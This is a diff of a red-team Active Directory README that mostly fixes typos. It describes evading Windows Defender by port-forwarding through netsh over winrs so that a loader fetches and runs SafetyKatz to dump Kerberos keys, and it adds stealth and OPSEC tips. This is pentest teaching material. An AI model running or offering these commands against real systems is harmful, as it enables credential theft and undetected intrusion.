seeu-inspace/easyg/active-directory/README.md

 9. Analysis using DefenderCheck

 **Avoid Detections**
 - Running an exe from a remote server will trigger windows defender.
-One way to avoid this is port forwarding in 8080 `$null | winrs -r:<remote-server> "netsh interface portproxy add v4tov4 listenport=8080 listen address=0.0.0.0 connectport=80 connectaddress=<IP>"`.
+One way to avoid this is port forwarding in 8080 `$null | winrs -r:<remote-server> "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=<IP>"`.
-  - Now you can run an exe like this `$ null | winrs -r:<remote-server> C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa:ekeys exit`
+  - Now you can run an exe like this `$null | winrs -r:<remote-server> C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit`
   - To check if the port forwarding is still active `netsh interface portproxy show v4tov4`

 **Good OPSEC**
 - It’s better to use a Windows OS to increase stealth and flexibility.
 - Always make sure to use a LDAP based tools, never .NET commands (SAMR)
 - Always enumerate first, do not grab the low hanging fruit first, since it may be a decoy.
 Also check logon count and login policy.
-  - An example: run `Get-DomainUser | select samaccountname, logonCount`, if you see an account that seems like a low hanging fruit but has zero logons, it might be a decoy or a dorment user.
+  - An example: run `Get-DomainUser | select samaccountname, logonCount`, if you see an account that seems like a low hanging fruit but has zero logons, it might be a decoy or a dormant user.
   - Check: logonCount, lastlogontimestamp, badpasswordtime, Description
-  - Take also in consideration your target organization: is this their first assesment?
+  - Take also in consideration your target organization: is this their first assessment?
 Do they invest in their security (time, effort)?
 - Making changes to the local administrator group is one of the noisiest things you can do
 - Domain Admin privilege is something that you should never go for
 - In a real Red Team operation, you will not use a Golden Ticket unless you want to check for detections of it.
 This because it’s noisy